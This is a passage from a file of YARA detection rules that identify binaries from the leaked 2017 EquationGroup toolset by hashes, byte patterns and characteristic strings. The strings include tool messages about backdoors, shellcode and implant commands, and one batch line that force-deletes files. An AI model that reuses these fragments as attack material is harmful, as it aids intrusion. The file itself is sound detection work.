+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 17:16:51"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7fe4c3cedfc98a3e994ca60579f91b8b88bf5ae8cf669baa0928508642c5a887"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[*] Failed to detect OS / Service Pack on %s:%d" fullword ascii
+      $x2 = "[*] SMB String: %s (%s)" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 80KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Mofconfig_1_0_0_RID373C : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 17:29:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c67a24fe2380331a101d27d6e69b82d968ccbae54a89a2629b6c135436d7bdb2"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[-] Get RemoteMOFTriggerPath error" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 50KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Easypi_Explodingcan_RID399C : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 19:11:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "dc1ddad7e8801b5e37748ec40531a105ba359654ffe8bdb069bd29fb0b5afd94"
+      hash2 = "97af543cf1fb59d21ba5ec6cb2f88c8c79c835f19c8f659057d2f58c321a0ad4"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[-] %s - Target might not be in a usable state." fullword ascii
+      $x2 = "[*] Exploiting Target" fullword ascii
+      $x3 = "[-] Encoding Exploit Payload failed!" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Eclipsedwingtouch_1_0_4_RID3AA9 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 19:56:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "46da99d80fc3eae5d1d5ab2da02ed7e61416e1eafeb23f37b180c46e9eff8a1c"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[-] The target is NOT vulnerable" fullword ascii
+      $x2 = "[+] The target IS VULNERABLE" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 50KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Iistouch_1_2_2_RID36F0 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 17:17:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c433507d393a8aa270576790acb3e995e22f4ded886eb9377116012e247a07c6"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[-] Are you being redirectect? Need to retarget?" fullword ascii
+      $x2 = "[+] IIS Target OS: %s" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 60KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Namedpipetouch_2_0_0_RID395B : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 19:00:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "cb5849fcbc473c7df886828d225293ffbd8ee58e221d03b840fd212baeda6e89"
+      hash2 = "043d1c9aae6be65f06ab6f0b923e173a96b536cf84e57bfd7eeb9034cd1df8ea"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "[*] Summary: %d pipes found" fullword ascii
+      $s3 = "[+] Testing %d pipes" fullword ascii
+      $s6 = "[-] Error on SMB startup, aborting" fullword ascii
+      $s12 = "92a761c29b946aa458876ff78375e0e28bc8acb0" fullword ascii
+      $op1 = { 68 10 10 40 00 56 e8 e1 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 40KB and 2 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Easybee_1_0_1_RID3663 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 16:53:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "59c17d6cb564edd32c770cd56b5026e4797cf9169ff549735021053268b31611"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "@@for /f \"delims=\" %%i in ('findstr /smc:\"%s\" *.msg') do if not \"%%MsgFile1%%\"==\"%%i\" del /f \"%%i\"" fullword ascii
+      $x2 = "Logging out of WebAdmin (as target account)" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Regread_1_1_1_RID3660 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 16:53:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "722f034ba634f45c429c7dafdbff413c08976b069a6b30ec91bfa5ce2e4cda26"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "[+] Connected to the Registry Service" fullword ascii
+      $s2 = "f08d49ac41d1023d9d462d58af51414daff95a6a" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 80KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Englishmansdentist_1_2_0_RID3B1A : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 20:14:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2a6ab28885ad7d5d64ac4c4fb8c619eca3b7fb3be883fc67c90f3ea9251f34c6"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[+] CheckCredentials(): Checking to see if valid username/password" fullword ascii
+      $x2 = "Error connecting to target, TbMakeSocket() %s:%d." fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Architouch_Eternalsynergy_Smbtouch_RID3FDF : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 23:38:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "444979a2387530c8fbbc5ddb075b15d6a4717c3435859955f37ebc0f40a4addc"
+      hash2 = "92c6a9e648bfd98bbceea3813ce96c6861487826d6b2c3d462debae73ed25b34"
+      hash3 = "108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "NtErrorMoreProcessingRequired" fullword ascii
+      $s2 = "Command Format Error: Error=%x" fullword ascii
+      $s3 = "NtErrorPasswordRestriction" fullword ascii
+      $op0 = { 8a 85 58 ff ff ff 88 43 4d } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 600KB and 2 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Eternalromance_2_RID3837 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 18:11:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f1ae9fdbb660aae3421fd3e5b626c1e537d8e9ee2f9cd6d56cb70b6878eaca5d"
+      hash2 = "b99c3cc1acbb085c9a895a8c3510f6daaf31f0d2d9ccb8477c7fb7119376f57b"
+      hash3 = "92c6a9e648bfd98bbceea3813ce96c6861487826d6b2c3d462debae73ed25b34"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[+] Backdoor shellcode written" fullword ascii
+      $x2 = "[*] Attempting exploit method %d" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 600KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17__Emphasismine_RID3738 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 17:29:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "dcaf91bd4af7cc7d1fb24b5292be4e99c7adf4147892f6b3b909d1d84dd4e45b"
+      hash2 = "348eb0a6592fcf9da816f4f7fc134bcae1b61c880d7574f4e19398c4ea467f26"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Error: Could not calloc() for shellcode buffer" fullword ascii
+      $x2 = "shellcodeSize: 0x%04X + 0x%04X + 0x%04X = 0x%04X" fullword ascii
+      $x3 = "Generating shellcode" fullword ascii
+      $x4 = "([0-9a-zA-Z]+) OK LOGOUT completed" fullword ascii
+      $x5 = "Error: Domino is not the expected version. (%s, %s)" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Eternalromance_RID37A6 : APT DEMO EXE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 17:47:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f1ae9fdbb660aae3421fd3e5b626c1e537d8e9ee2f9cd6d56cb70b6878eaca5d"
+      hash2 = "b99c3cc1acbb085c9a895a8c3510f6daaf31f0d2d9ccb8477c7fb7119376f57b"
+      tags = "APT, DEMO, EXE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[-] Error: Exploit choice not supported for target OS!!" fullword ascii
+      $x2 = "Error: Target machine out of NPP memory (VERY BAD!!) - Backdoor removed" fullword ascii
+      $x3 = "[-] Error: Backdoor not present on target" fullword ascii
+      $x4 = "***********    TARGET ARCHITECTURE IS X64    ************" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 1 of them ) or 2 of them
+}
+
+rule EquationGroup_Toolset_Apr17_Gen4_RID3344 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 14:40:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "fe7ce2fdb245c62e4183c728bc97e966a98fdc8ffd795ed09da23f96e85dcdcd"
+      hash2 = "0989bfe351342a7a1150b676b5fd5cbdbc201b66abcb23137b1c4de77a8f61a6"
+      hash3 = "270850303e662be53d90fa60a9e5f4bd2bfb95f92a046c77278257631d9addf4"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[+] \"TargetPort\"      %hu" fullword ascii
+      $x2 = "---<<<  Complete  >>>---" fullword ascii
+      $x3 = "[+] \"NetworkTimeout\"  %hu" fullword ascii
+      $op1 = { 46 83 c4 0c 83 fe 0c 0f 8c 5e ff ff ff b8 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 150KB and ( 1 of ( $x* ) or 2 of them ) )
+}
+
+rule EquationGroup_Toolset_Apr17_Gen1_RID3341 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 14:40:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1b5b33931eb29733a42d18d8ee85b5cd7d53e81892ff3e60e2e97f3d0b184d31"
+      hash2 = "139697168e4f0a2cc73105205c0ddc90c357df38d93dbade761392184df680c7"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Restart with the new protocol, address, and port as target." fullword ascii
+      $x2 = "TargetPort      : %s (%u)" fullword ascii
+      $x3 = "Error: strchr() could not find '@' in account name." fullword ascii
+      $x4 = "TargetAcctPwd   : %s" fullword ascii
+      $x5 = "Creating CURL connection handle..." fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 80KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Gen2_RID3342 : APT DEMO EXE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 14:40:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7fe425cd040608132d4f4ab2671e04b340a102a20c97ffdcf1b75be43a9369b5"
+      hash2 = "561c0d4fc6e0ff0a78613d238c96aed4226fbb7bb9ceea1d19bc770207a6be1e"
+      hash3 = "f2e90e04ddd05fa5f9b2fec024cd07365aebc098593d636038ebc2720700662b"
+      tags = "APT, DEMO, EXE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "[+] Setting password : (NULL)" fullword ascii
+      $s2 = "[-] TbBuffCpy() failed!" fullword ascii
+      $s3 = "[+] SMB negotiation" fullword ascii
+      $s4 = "12345678-1234-ABCD-EF00-0123456789AB" fullword ascii
+      $s5 = "Value must end with 0000 (2 NULLs)" fullword ascii
+      $s6 = "[*] Configuring Payload" fullword ascii
+      $s7 = "[*] Connecting to listener" fullword ascii
+      $op1 = { b0 42 40 00 89 44 24 30 c7 44 24 34 } 
+      $op2 = { eb 59 8b 4c 24 10 68 1c 46 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 80KB and 1 of ( $s* ) and 1 of ( $op* ) ) or 3 of them
+}
+
+rule EquationGroup_Toolset_Apr17_Gen3_RID3343 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 14:40:21"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "270850303e662be53d90fa60a9e5f4bd2bfb95f92a046c77278257631d9addf4"
+      hash2 = "7a086c0acb6df1fa304c20733f96e898d21ca787661270f919329fadfb930a6e"
+      hash3 = "c236e0d9c5764f223bd3d99f55bd36528dfc0415e14f5fde1e5cdcada14f4ec0"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Logon failed.  Kerberos ticket not yet valid (target and KDC times not synchronized)" fullword ascii
+      $s2 = "[-] Could not set \"CredentialType\"" fullword ascii
+      $op1 = { 46 83 c4 0c 83 fe 0c 0f 8c 5e ff ff ff b8 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 150KB and 2 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_yak_RID333B : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 14:39:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "66ff332f84690642f4e05891a15bf0c9783be2a64edb2ef2d04c9205b47deb19"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "-xd = dump archive data & store in scancodes.txt" fullword ascii
+      $x2 = "-------- driver start token -------" fullword wide
+      $x3 = "-------- keystart token -------" fullword wide
+      $x4 = "-xta = same as -xt but show special chars & store in keys_all.txt" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 800KB and 2 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_AdUser_Implant_RID376E : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 17:38:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "fd2efb226969bc82e2e38769a10a8a751138db69f4594a8de4b3c0522d4d885f"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = ".?AVFeFinallyFailure@@" fullword ascii
+      $s2 = "(&(objectCategory=person)(objectClass=user)(cn=" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 40KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_RemoteExecute_Implant_RID3A69 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 19:45:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "770663c07c519677316934cf482e500a73540d9933342c425f3e56258e6e6d8b"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $op1 = { 53 00 63 00 68 00 65 00 64 00 75 00 6C 00 65 00
+               00 00 00 00 53 00 65 00 72 00 76 00 69 00 63 00
+               65 00 73 00 41 00 63 00 74 00 69 00 76 00 65 00
+               00 00 00 00 FF FF FF FF 00 00 00 00 B0 17 00 68
+               5C 00 70 00 69 00 70 00 65 00 5C 00 53 00 65 00
+               63 00 6F 00 6E 00 64 00 61 00 72 00 79 00 4C 00
+               6F 00 67 00 6F 00 6E 00 00 00 00 00 5C 00 00 00
+               57 00 69 00 6E 00 53 00 74 00 61 00 30 00 5C 00
+               44 00 65 00 66 00 61 00 75 00 6C 00 74 00 00 00
+               6E 00 63 00 61 00 63 00 6E 00 5F 00 6E 00 70 00
+               00 00 00 00 5C 00 70 00 69 00 70 00 65 00 5C 00
+               53 00 45 00 43 00 4C 00 4F 00 47 00 4F 00 4E } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 40KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Banner_Implant9x_RID3831 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 18:10:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "5d69a8cfc9b636448f023fcf18d111f13a8e6bcb9a693eb96276e0d796ab4e0c"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = ".?AVFeFinallyFailure@@" fullword ascii
+      $op1 = { c9 c3 57 8d 85 2c eb ff ff } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 20KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_greatdoc_dll_config_RID39AF : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 19:14:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "fd9d0abfa727784dd07562656967d220286fc0d63bcf7e2c35d4c02bc2e5fc2e"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "C:\\Projects\\GREATERDOCTOR\\trunk\\GREATERDOCTOR" ascii
+      $x2 = "src\\build\\Release\\dllConfig\\dllConfig.pdb" ascii
+      $x3 = "GREATERDOCTOR [ commandline args configuration ]" fullword ascii
+      $x4 = "-useage: <scanner> \"<cmdline args>\"" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_scanner_RID34E0 : APT DEMO EXE FILE HKTL {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 15:49:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f180bdb247687ea9f1b58aded225d5c80a13327422cd1e0515ea891166372c53"
+      tags = "APT, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "+daemon_version,system,processor,refid,clock" fullword ascii
+      $x2 = "Usage: %s typeofscan IP_address" fullword ascii
+      $x3 = "# scanning ip  %d.%d.%d.%d" fullword ascii
+      $x4 = "Welcome to the network scanning tool" fullword ascii
+      $x5 = "***** %s ***** (length %d)" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 90KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Mcl_NtMemory_Std_RID3836 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 18:11:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "087db4f2dbf8e0679de421fec8fb2e6dd50625112eb232e4acc1408cc0bcd2d7"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $op1 = { 44 24 37 50 c6 44 24 38 72 c6 44 } 
+      $op2 = { 44 24 33 6f c6 44 24 34 77 c6 } 
+      $op3 = { 3b 65 c6 44 24 3c 73 c6 44 24 3d 73 c6 44 24 3e } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_tacothief_RID35AD : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 16:23:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c71953cc84c27dc61df8f6f452c870a7880a204e9e21d9fd006a5c023b052b35"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "File too large!  Must be less than 655360 bytes." fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_ntevt_RID3427 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 15:18:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4254ee5e688fc09bdc72bcc9c51b1524a2bb25a9fb841feaf03bc7ec1a9975bf"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "c:\\ntevt.pdb" fullword ascii
+      $s1 = "ARASPVU" fullword ascii
+      $op1 = { 41 5a 41 59 41 58 5f 5e 5d 5a 59 5b 58 48 83 c4 } 
+      $op2 = { f9 48 03 fa 48 33 c0 8a 01 49 03 c1 49 f7 e0 88 } 
+      $op3 = { 01 41 f6 e0 49 03 c1 88 01 48 33 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 700KB and $x1 or 3 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Processes_Target_RID3873 : APT DEMO EXE FILE T1047 T1057 {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 18:21:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "69cf7643dbecc5f9b4b29edfda6c0295bc782f0e438f19be8338426f30b4cc74"
+      tags = "APT, DEMO, EXE, FILE, T1047, T1057"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Select * from Win32_Process" fullword ascii
+      $s3 = "\\\\%ls\\root\\cimv2" fullword wide
+      $s5 = "%4ls%2ls%2ls%2ls%2ls%2ls.%11l[0-9]%1l[+-]%6s" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_st_lp_RID3418 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 15:15:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3b6f756cca096548dcad2b6c241c1dafd16806c060bec82a530f4d38755286a2"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Previous command: set injection processes (status=0x%x)" fullword ascii
+      $x2 = "Secondary injection process is <null> [no secondary process will be used]" fullword ascii
+      $x3 = "Enter the address to be used as the spoofed IP source address (xxx.xxx.xxx.xxx) -> " fullword ascii
+      $x4 = "E: Execute a Command on the Implant" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_EpWrapper_RID358C : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 16:17:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a8eed17665ee22198670e22458eb8c9028ff77130788f24f44986cce6cebff8d"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "* Failed to get remote TCP socket address" fullword wide
+      $x2 = "* Failed to get 'LPStart' export" fullword wide
+      $s5 = "Usage: %ls <logdir> <dll_search_path> <dll_to_load_path> <socket>" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 20KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_DiBa_Target_2000_RID372D : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
